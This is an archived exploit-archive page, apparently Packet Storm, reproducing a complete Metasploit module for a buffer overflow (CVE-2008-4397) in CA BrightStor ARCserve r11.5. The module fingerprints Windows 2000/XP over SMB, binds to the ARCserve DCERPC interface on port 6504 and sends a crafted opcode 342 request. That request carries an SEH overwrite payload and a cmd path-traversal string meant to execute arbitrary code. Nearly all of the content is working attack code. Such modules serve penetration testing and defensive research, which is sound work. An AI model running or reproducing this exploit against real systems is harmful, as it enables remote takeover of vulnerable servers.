what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Computer Associates ARCserve REPORTREMOTEEXECUTECML Buffer Overflow

Computer Associates ARCserve REPORTREMOTEEXECUTECML Buffer Overflow
Posted Dec 31, 2009
Authored by MC, Nahuel Cayento Riva | Site metasploit.com

This Metasploit module exploits a buffer overflow in Computer Associates BrighStor ARCserve r11.5 (build 3884). By sending a specially crafted RPC request to opcode 0x342, an attacker could overflow the buffer and execute arbitrary code. In order to successfully exploit this vulnerability, you will need set the hostname argument (HNAME).

tags | exploit, overflow, arbitrary
advisories | CVE-2008-4397
SHA-256 | 25561774611f62f76340df5f53273f88999603ab3128927abfd951eddc17dd28

Computer Associates ARCserve REPORTREMOTEEXECUTECML Buffer Overflow

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking

include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::SMB
include Msf::Exploit::Remote::Seh

def initialize(info = {})
super(update_info(info,
'Name' => 'Computer Associates ARCserve REPORTREMOTEEXECUTECML Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Computer Associates BrighStor ARCserve r11.5 (build 3884).
By sending a specially crafted RPC request to opcode 0x342, an attacker could overflow the buffer
and execute arbitrary code. In order to successfully exploit this vulnerability, you will need
set the hostname argument (HNAME).
},
'Author' => [ 'Nahuel Cayento Riva', 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 7724 $',
'References' =>
[
[ 'BID', '31684' ],
[ 'OSVDB', '49468' ],
[ 'CVE', '2008-4397' ],
[ 'URL', 'http://crackinglandia.blogspot.com/2009/10/el-colador-de-ca-computer-associates.html' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 550,
'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Computer Associates BrighStor ARCserve r11.5 (build 3884)', { 'Ret' => 0x2123bdf4 } ], # ASCORE.dll 11.5.3884.0
],
'DisclosureDate' => 'Oct 9 2008',
'DefaultTarget' => 0))

register_options(
[
OptString.new('HNAME', [ true, 'The NetBios hostname of the target.']),
Opt::RPORT(6504)
], self.class)

end

def fingerprint

datastore['RPORT'] = 445
os = smb_fingerprint()
return os

end

def exploit

path = fingerprint()

if ( path['os'] =~ /Windows 2000/ )
dir = "winnt"
offset = 442
elsif ( path['os'] =~ /Windows XP/ )
dir = "windows"
offset = 436
else
print_error("Target not supported!")
return
end

print_status("Identified OS '#{path['os']}', setting appropiate system path...")

datastore['RPORT'] = 6504

connect()

handle = dcerpc_handle('506b1890-14c8-11d1-bbc3-00805fa6962e', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
print_status("Binding to #{handle} ...")

dcerpc_bind(handle)
print_status("Bound to #{handle} ...")

buffer = rand_text_alpha_upper(offset) + generate_seh_payload(target.ret)

sploit = NDR.string("#{datastore['HNAME'].upcase}")
sploit << NDR.string("..\\..\\..\\..\\..\\..\\..\\..\\..\\#{dir}\\system32\\cmd /c \"""\"""")
sploit << NDR.string(buffer)
sploit << NDR.string(rand_text_alpha_upper(20))
sploit << NDR.long(2)
sploit << NDR.long(2)
sploit << NDR.string(rand_text_alpha_upper(20))
sploit << NDR.long(0)
sploit << NDR.long(4)

print_status("Trying target #{target.name}...")

begin
dcerpc_call(342, sploit)
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
end

handler
disconnect
end
end
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close